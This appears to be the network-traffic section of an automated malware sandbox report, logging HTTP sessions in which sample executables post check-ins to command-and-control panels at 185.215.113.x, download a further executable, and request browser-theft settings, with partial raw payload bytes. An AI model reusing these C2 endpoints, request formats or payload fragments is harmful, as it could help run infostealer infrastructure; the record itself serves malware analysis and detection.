                                                                                                                                                                                                                                                                                                            content-disposition: attachment; filename="36EpLiutqfXtaXMkXOTru;"
                                                                                                                                                                                                                                                                                                            last-modified: Tue, 19 Nov 2024 12:29:07 GMT
                                                                                                                                                                                                                                                                                                            cache-control: no-cache
                                                                                                                                                                                                                                                                                                            etag: "1732019347.4431374-10815536-3919321515"
                                                                                                                                                                                                                                                                                                            Data Raw: 9b 04 9e 1d e2 2a 68 73 fe d9 48 6f 2c 36 36 c8 a4 e4 ba e7 12 f9 22 5d 6f 07 aa d2 fb 8c a2 b3 95 1e b6 6c ff 92 32 40 41 97 30 99 34 26 c9 44 c2 1e 7f 22 13 cd 10 62 a7 32 f3 c2 5c 11 ed c0 71 4a 49 c7 9d 3e 95 07 3e 4a 0a 6f 63 4c 1a b8 b6 1a 3d 67 8e 9d ed 46 4c 04 61 0a c6 3c 7b 3a f6 0d 3f 30 0d 33 18 56 4c f0 76 7a 8b c7 a1 f1 75 64 d6 00 c3 e9 df 3a 1b 4f 35 50 64 a6 db 6b 23 6a aa e6 6c 33 a4 69 a7 80 16 e0 e4 49 7c d0 73 7d bf 61 a2 62 7a 62 8e 5b f4 4d a9 ba 05 ae 7f d8 0c 3c 1e 71 cb 84 47 32 b1 63 64 df 8e 7a 22 8c 8e 33 7d f1 20 f1 74 04 61 fd 18 55 10 be 45 7d f4 63 45 d4 d0 16 17 c4 c8 a6 7d 44 80 d2 ba e9 1a 17 37 63 43 e4 22 3e c5 e4 a4 16 51 4f 2d 57 23 3a 36 33 fa f3 c5 aa 04 00 79 5c 1f 43 8d f1 b2 56 df 86 17 bc df 28 44 b7 aa 85 64 2d 2f 94 0d a5 7c 18 37 92 cb 0d 76 40 2e 05 16 6a ce b1 8c 0a e3 7d 08 00 ce 6a ef d3 51 b9 3b 81 19 3c 3f 6c 3e 37 fe 3f d7 b3 7d 60 7e e2 b1 a4 1f 00 62 27 63 3d fd 4b 06 87 dc 8e 8e fa 56 9b bf 7a dc a3 07 20 e3 0b 1a f5 06 b1 0f 6d 27 af dd 1b [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: *hsHo,66"]ol2@A04&D"b2\qJI>>JocL=gFLa<{:?03VLvzud:O5Pdk#jl3iI|s}abzb[M<qG2cdz"3} taUE}cE}D7cC">QO-W#:63y\CV(Dd-/|7v@.j}jQ;<?l>7?}`~b'c=KVz m'3~\K ^m_F<4xrG/dz4?gv5,?^w@X^wZ1~7C+Z&dp`#9XgJC>e93VGh74x?x[3=YT.Qa `M*G?_zGkB+(#8RUeY[x-$4`zAc`vmVlP+>tsd@>ydCHSnt+_`"FitXXD.}P #(4K<0b h;]6{bgEqvZ>4*o]2?}#|![L&*!z";ZY<PPT9HC}M*65qs#ep%@LlGH)bj'7a: ;B3L0"
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.422926903 CET1236INData Raw: b8 ff 32 30 58 cd 81 20 5f b7 4d f7 d5 77 53 0a 4f e7 60 83 ed 44 cc d0 f5 71 1e 4e 4f f8 01 9b 7d 28 47 50 fb 75 8d 8e 55 9f 9d c6 2b 06 24 6f 58 e4 80 8f e0 a2 b4 79 5d f7 cf 4a e0 fc b8 91 16 d1 c7 db 64 34 ea ff 9a 7a 67 99 a9 5e e5 15 9c c8
                                                                                                                                                                                                                                                                                                            Data Ascii: 20X _MwSO`DqNO}(GPuU+$oXy]Jd4zg^h(>sNk=@nIEbcZ"~Q6]4AGc]>2+<X]2]CRq[Ya{YvF{m2*bg3|8IBlm&
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.422981024 CET1236INData Raw: 31 a0 27 b0 31 e8 22 a5 51 78 81 6b ea a9 43 84 11 c4 be 3a 3c 17 d0 63 57 c5 20 31 2f c5 f3 3d bf 67 df 7f 0a 0e 93 9c af 04 65 f3 af a9 d4 4f 98 e4 8e ec 3f 1b 0f e9 f3 b7 01 21 79 8f 56 8d ec 70 82 ac 4b 64 58 ce 90 f4 54 8d 94 fe aa 7b 06 b3
                                                                                                                                                                                                                                                                                                            Data Ascii: 1'1"QxkC:<cW 1/=geO?!yVpKdXT{`6u}]dTlC%hU.|zi<kGB5}mP*=PNp?%G~e|NSF{)Of*I"&l6~/YLm#K>
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.423015118 CET552INData Raw: 52 23 c5 90 d5 ff 98 77 06 c3 aa 7f 85 27 36 0c 3d 95 5d f4 72 4e 81 4b 66 ae 6d 23 f3 44 c6 b9 51 f6 7b 5b 38 44 ca f3 b2 7c cf 81 a7 28 04 b5 36 b4 fb 4f 20 f4 f8 c4 28 41 7e c3 7e 89 b0 03 17 ce b1 07 49 cd b1 88 29 27 55 18 25 6f 10 b0 06 82
                                                                                                                                                                                                                                                                                                            Data Ascii: R#w'6=]rNKfm#DQ{[8D|(6O (A~~I)'U%o%.8]<4428@9]VGi&3'/SvepiD`)fhOOu;{ad=E/Z7h(}ZD0EZE_EP=5>J5B
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.423065901 CET1236INData Raw: 54 65 68 8b e4 85 de 32 cf 3f a9 91 d9 b6 ed 84 92 fe 43 ef 63 9d c2 e9 e7 0c 37 eb 8e 40 ac ba 3b 5e dc c7 ba 12 00 66 bd c0 4d 3d c3 a8 ae a7 d5 d7 6f 36 bd e3 46 64 0b b0 9d 1c 3f d1 b7 6e 1a 8c 4b 17 be f7 39 cb cb 34 a8 10 80 2e 96 00 d5 f9
                                                                                                                                                                                                                                                                                                            Data Ascii: Teh2?Cc7@;^fM=o6Fd?nK94.Ss^YB2*Eapp_&Lh@:;H9&kDH32x&0z<O|(4;'=<ZBS1a<aQNyA;4^p;'Ok
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.423100948 CET1236INData Raw: e5 72 d2 c7 ce 58 5f c5 50 24 a4 62 ec 06 7d 5b 16 4f 20 b9 42 df 3a 3c 09 6c 9e 12 d6 34 bd 67 b1 17 49 a9 d8 41 50 fc f8 46 77 25 32 61 ac 60 5e 5f 01 e9 83 c2 64 84 10 41 93 a8 32 8b 72 69 b6 a4 ae 40 51 dc de bd 43 8d 9c 9e 5f 25 5d a9 a1 9a
                                                                                                                                                                                                                                                                                                            Data Ascii: rX_P$b}[O B:<l4gIAPFw%2a`^_dA2ri@QC_%]-zW"H-9o<oajCER X<.GF3*|Y?pn3iEox/rq>M9{U@8^y,xy>oir
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.423136950 CET1236INData Raw: 66 b0 d8 a9 0e 54 43 ee cb b7 a1 20 0f 5c c5 1e b1 e1 26 d2 e9 03 fc 72 d5 ea aa 46 6d 73 a1 d1 66 c9 b6 ee 9a 5c 4f dc bf 94 e1 cb 01 a2 23 23 2c 0f c7 9a 52 f5 a2 21 95 81 02 f6 24 54 f3 75 5d e6 e3 52 b3 1e 12 9c 7f 8d 7a 60 41 95 35 92 aa 18
                                                                                                                                                                                                                                                                                                            Data Ascii: fTC \&rFmsf\O##,R!$Tu]Rz`A5=Yw&Ex3XvNX^XjyJncs:q_gBpK6q+.K%sZ. W, aTz,h;fas#F@{Hy,Ir>T%}X|(
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.423175097 CET1236INData Raw: ca bf 3d 19 75 6f cd be 19 1d de 0d b3 77 d9 dc 60 e6 17 e8 44 3b 06 e6 53 d8 20 d5 14 56 4f 38 26 fe 6c 11 5c d0 8d 0e 36 84 51 23 9d e1 84 dc de 67 dd 77 ae 60 d9 76 6e ca 68 c2 62 61 e1 76 e4 8a 95 b4 c3 60 2f 57 d0 11 94 d1 30 f4 3a 97 1b 61
                                                                                                                                                                                                                                                                                                            Data Ascii: =uow`D;S VO8&l\6Q#gw`vnhbav`/W0:acnXmPOAAi[kzx+qMVZUMsj-C/>dNVQG]y,V}Msi@,%VAaMKu|]a4n&'99yI]
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.423207998 CET1236INData Raw: fb c4 e4 54 a4 42 d1 bb 0d c6 08 d8 cd a0 c6 7b 47 2d bf 44 07 1e 1e dc 47 9f 30 5f 8a b3 cc 50 5f 0c 37 a9 81 1f ed 36 a0 c8 db 24 b6 1e 3d 24 2f d1 8d c3 4b 95 f9 0e 98 0e a2 c4 1a 1d 89 19 28 89 36 c9 22 4e 90 44 9b 06 fc 76 ef 66 a7 f0 96 3d
                                                                                                                                                                                                                                                                                                            Data Ascii: TB{G-DG0_P_76$=$/K(6"NDvf=nk$ip{sh(:<(+K]xL%Py6$],x[F("SR}RiUiq\TfKxzLj<bT,
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.423242092 CET829INData Raw: ba 6f 1e 07 e2 63 1e c8 6a 3b 18 0d 94 c4 d4 c1 38 af 08 d6 76 ea cb b4 80 4b d2 d9 26 eb 42 87 41 03 92 ab 66 72 10 06 52 9c ea a7 36 84 97 d7 e6 5c 0f 5a f1 5a 28 e0 45 a4 db ff 8b 4b b0 a3 17 b4 2a 5a f6 86 a9 49 f6 5c 1e 7c 3e 8e f0 26 4d 1d
                                                                                                                                                                                                                                                                                                            Data Ascii: ocj;8vK&BAfrR6\ZZ(EK*ZI\|>&M#NvnTY%Gg<TVP(Y(v']}SE{Cm\QF39a}JTm<Ey]$B|V&AU; Gca_0X.dbWAf,n;,H
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.543260098 CET1236INData Raw: 22 77 89 a9 7c e2 e9 09 22 73 87 7b bc 56 fb cc 68 b2 96 29 3f 52 c8 17 d3 67 62 77 39 55 fc a9 2d 8c 2e 91 e9 47 d8 42 6c 48 e5 be 15 b1 a6 48 f6 9b ef 7a 70 38 28 b6 3e 4b 1c 0d 87 aa 56 1a 26 97 c3 cf e8 5f 46 b5 03 a3 82 d2 c8 d1 6b 2b d7 d9
                                                                                                                                                                                                                                                                                                            Data Ascii: "w|"s{Vh)?Rgbw9U-.GBlHHzp8(>KV&_Fk+j0!\&YZ!jP= >KZ!8(V?AzgJ[;D5i+VY6@Ox'RV*x*|JPdhlAO(&XyHv;q"'7%


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            6192.168.2.449819185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:30.972580910 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 30 37 39 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                                            Data Ascii: d1=1007914001&unit=246122658369
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:32.398431063 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:32 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            7192.168.2.449826185.215.113.16802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:32.553985119 CET56OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:33.903558016 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:33 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                            Content-Length: 1800704
                                                                                                                                                                                                                                                                                                            Last-Modified: Thu, 21 Nov 2024 10:54:04 GMT
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            ETag: "673f114c-1b7a00"
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 22 01 00 00 00 00 00 00 60 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 69 00 00 04 00 00 eb 62 [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELO/g"`i@ib@M$a$$ $b@.rsrc$r@.idata $t@ *$v@swacraubpOx@agtryiojPiT@.taggant0`i"X@
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:33.903580904 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:33.904232025 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:33.904257059 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:33.904270887 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:33.904894114 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:33.904927015 CET1236INData Raw: 75 5b 25 ed 2f 6e 6f 31 6d 21 02 24 b7 ac 81 82 4d d8 4c a5 be 34 26 1d 67 5d 01 9e 4e 66 fc 6c df 63 1e b0 fd e7 b7 39 0a 46 34 16 01 6a 04 44 a2 f2 d6 e9 0e 71 e5 69 bd 6e 0b 3e cc 91 34 51 bc 59 a0 57 12 6e 72 03 a3 e9 74 b8 4d 5e 65 35 fe 9d
                                                                                                                                                                                                                                                                                                            Data Ascii: u[%/no1m!$ML4&g]Nflc9F4jDqin>4QYWnrtM^e5&3Q\pv3A~tdAngg21F#WKd9Xwivdw7('mwLTA{c!'KL(Wi(p*/Q)FDnb=7O69J4_sR 5
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:33.904939890 CET248INData Raw: c4 e2 25 ef ae 5d 92 4b 3e 2f b9 ec 88 31 d3 bd f7 48 fb af 02 ca ee 2b 5c f9 e9 bc bb 26 39 46 e2 c2 57 b7 a5 d5 fb 67 6e 10 47 01 f9 13 31 b7 be 38 74 d9 03 e5 35 d6 80 5b 30 26 d2 01 70 0d 84 9e 13 1c f0 bf 0d 77 d6 f8 0e 53 55 d4 9b 97 70 71
                                                                                                                                                                                                                                                                                                            Data Ascii: %]K>/1H+\&9FWgnG18t5[0&pwSUpq@+J7(+nA]fEq=F,P[{^@>wzm3K]Irl{eSie[ac|l}r~isb\]ct]f&swj8 zd$9Hw$L.o)AxD
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:33.905664921 CET1236INData Raw: 40 5b a5 89 d8 fb fd cc 3c a1 ab 7e 1a 11 26 09 bb 41 df b3 fd bb 05 1c 0f 1d 13 65 9b fa be e4 00 80 fd 3d a6 98 38 d6 10 5c 9d 4e 48 eb 47 c7 f6 6d e3 bf 74 9d 17 15 2f 5d 78 77 9e f8 1d ac 01 cd 6f 79 6d 70 63 15 66 fe 16 89 cf c4 45 50 46 37
                                                                                                                                                                                                                                                                                                            Data Ascii: @[<~&Ae=8\NHGmt/]xwoympcfEPF7Kw!|tQdWv..sD,iI^m"vfV}]F=msq6(I+~{gM7s<1Y/Q)Mz?4?6.&Tp/c]aY
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:33.905680895 CET1236INData Raw: b4 b3 43 7d ff b9 7b c8 66 f6 64 99 f7 97 a3 95 72 6b 6f 47 9a 66 51 79 30 19 1e 2d 04 e9 38 59 f8 ad 3b ac d3 6d 77 57 f6 6e af 6a c6 5d 22 54 37 e4 d8 b9 04 d2 77 47 7e e0 35 3e 36 16 1c 1d 05 77 fb 42 3e a1 1f 28 72 e5 6f 47 06 73 43 4d 04 1d
                                                                                                                                                                                                                                                                                                            Data Ascii: C}{fdrkoGfQy0-8Y;mwWnj]"T7wG~5>6wB>(roGsCMxNnz&kie}<>k.gyKKnvn]j=kx-95KMxuzoDuK&#i.v3IFZigzMwrwCFP!:n%3|6mVf1Qh2|m
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:34.023344994 CET1236INData Raw: aa 5e f1 36 26 69 c5 d6 b6 d9 09 fd 15 5f 4e 39 10 6b 91 46 fe 4d 91 76 76 76 ff 4c c5 77 fb 50 63 71 7b 55 7a dd e9 35 70 96 cc ae f4 b8 43 55 09 95 7b 0d cf a8 03 ac 16 a5 04 6a 52 e6 cf b0 01 1f 04 4d 91 cd 94 3e 7a 5d 9f a9 33 06 18 86 8e f6
                                                                                                                                                                                                                                                                                                            Data Ascii: ^6&i_N9kFMvvvLwPcq{Uz5pCU{jRM>z]3)xgk-B5Y 60]R}M5~Y-E36poeSz}k;0m3i&w;|2S~rrQdYO;9}g%2w;%]u<V!m426ewG5=]q


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            8192.168.2.449844185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:40.215097904 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 30 37 39 31 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                                            Data Ascii: d1=1007915001&unit=246122658369
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:41.197737932 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:40 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            9192.168.2.449846185.215.113.206807920C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:40.457745075 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:41.973146915 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:41 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:41.975585938 CET412OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----FBKJDGCGDAAAKECAKKJD
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Content-Length: 210
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 43 33 37 32 30 42 37 32 32 38 39 39 32 32 34 37 36 36 34 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: ------FBKJDGCGDAAAKECAKKJDContent-Disposition: form-data; name="hwid"84C3720B7228992247664------FBKJDGCGDAAAKECAKKJDContent-Disposition: form-data; name="build"mars------FBKJDGCGDAAAKECAKKJD--
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:42.596374035 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:42 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Content-Length: 180
                                                                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Data Raw: 4e 54 67 79 4e 6d 45 32 4d 7a 6b 34 4e 47 59 30 4d 47 45 32 59 6a 4e 69 5a 44 4d 31 4f 44 51 35 5a 54 41 78 4e 7a 49 30 4d 57 56 69 5a 6d 55 7a 5a 6a 59 31 4d 6a 68 6b 59 6a 41 78 59 7a 52 6d 4e 6a 4d 32 5a 44 4d 34 59 6d 49 79 4d 44 51 33 4e 7a 42 69 59 6d 4d 31 4f 44 51 35 4e 57 4a 6a 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                                                                                                                                                                                                                                            Data Ascii: NTgyNmE2Mzk4NGY0MGE2YjNiZDM1ODQ5ZTAxNzI0MWViZmUzZjY1MjhkYjAxYzRmNjM2ZDM4YmIyMDQ3NzBiYmM1ODQ5NWJjfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:42.944173098 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IDHDGIEHJJJJEBGDAFHJ
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Content-Length: 268
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: ------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="message"browsers------IDHDGIEHJJJJEBGDAFHJ--
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:43.402462959 CET1236INHTTP/1.1 200 OK
